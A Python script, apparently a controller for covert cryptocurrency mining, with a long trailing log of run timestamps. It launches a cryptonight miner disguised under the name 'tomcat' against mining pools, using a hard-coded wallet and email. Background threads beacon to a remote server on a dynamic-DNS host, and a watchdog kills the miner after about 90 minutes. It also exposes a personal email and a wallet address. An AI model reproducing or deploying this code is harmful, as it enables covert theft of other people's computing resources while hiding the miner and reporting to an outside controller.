import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:01.747290
#2018-02-17 16:42:04.366349
#2018-02-17 18:29:01.321231
#2018-02-17 20:18:04.162506
#2018-02-17 22:04:05.932625
#2018-02-17 23:48:05.402716
#2018-02-18 01:37:03.759697
#2018-02-18 03:24:01.388205
#2018-02-18 05:11:05.357207
#2018-02-18 07:03:03.411880
#2018-02-18 08:51:05.156903
#2018-02-18 10:38:04.183396
#2018-02-18 12:23:01.453483
#2018-02-18 14:11:05.155529
#2018-02-18 16:01:06.062134
#2018-02-18 17:50:07.135363
#2018-02-18 19:37:03.799362
#2018-02-18 21:22:06.534500
#2018-02-18 23:11:01.764765
#2018-02-19 00:57:01.429069
#2018-02-19 02:43:07.307631
#2018-02-19 04:30:08.153550
#2018-02-19 06:15:07.521575
#2018-02-19 08:03:01.556954
#2018-02-19 09:53:05.263582
#2018-02-19 11:42:04.929139
#2018-02-19 13:29:05.341274
#2018-02-19 15:17:05.413427
#2018-02-19 17:04:06.856082
#2018-02-19 18:53:01.552118
#2018-02-19 20:42:07.108570
#2018-02-19 22:29:07.796711
#2018-02-20 00:15:07.538392
#2018-02-20 02:03:06.202357
#2018-02-20 03:53:03.638541
#2018-02-20 05:36:03.577574
#2018-02-20 07:21:05.773937
#2018-02-20 09:06:07.757594
#2018-02-20 10:49:01.481510
#2018-02-20 12:36:08.312464
#2018-02-20 14:23:01.683509
#2018-02-20 16:08:04.157809
#2018-02-20 17:54:07.970283
#2018-02-20 19:45:11.156701
#2018-02-20 21:32:07.071240
#2018-02-20 23:14:05.080857
#2018-02-21 00:58:03.932320
#2018-02-21 02:44:06.933736
#2018-02-21 04:33:01.835346
#2018-02-21 06:19:06.354019
#2018-02-21 08:05:02.737621
#2018-02-21 09:51:01.381111
#2018-02-21 11:39:04.642312
#2018-02-21 13:27:07.674598
#2018-02-21 15:12:08.218029
#2018-02-21 17:02:06.555047
#2018-02-21 18:51:06.195889
#2018-02-21 20:40:08.001998
#2018-02-21 22:26:04.050130
#2018-02-22 00:16:06.622340
#2018-02-22 02:05:04.052556
#2018-02-22 03:51:06.591040
#2018-02-22 05:39:06.450371
#2018-02-22 07:24:05.221028
#2018-02-22 09:11:09.007164
#2018-02-22 11:00:12.042700
#2018-02-22 12:45:11.203328
#2018-02-22 14:32:09.504980
#2018-02-22 16:18:01.725280
#2018-02-22 18:06:08.357432
#2018-02-22 19:56:01.303075
#2018-02-22 21:45:05.638402
#2018-02-22 23:33:06.962010
#2018-02-23 01:20:01.316829
#2018-02-23 03:06:03.822099
#2018-02-23 04:53:01.306556
#2018-02-23 06:37:01.451628
#2018-02-23 08:26:04.289783
#2018-02-23 10:41:05.162873
#2018-02-23 12:38:07.699834
#2018-02-23 14:23:01.629136
#2018-02-23 16:14:06.599365
#2018-02-23 17:59:05.928627
#2018-02-23 19:45:01.564814
#2018-02-23 21:27:06.875560
#2018-02-23 23:14:05.635430
#2018-02-24 00:58:08.187051
#2018-02-24 02:51:05.831779
#2018-02-24 04:41:05.632224
#2018-02-24 06:25:07.052499
#2018-02-24 08:12:07.386274
#2018-02-24 09:58:04.803251
#2018-02-24 11:53:01.546453
#2018-02-24 13:44:06.699609
#2018-02-24 15:33:07.107895
#2018-02-24 17:28:01.969689
#2018-02-24 19:15:06.657640
#2018-02-24 21:02:05.835512
#2018-02-24 23:35:03.467852
#2018-02-25 02:56:06.171624
#2018-02-25 07:04:01.763295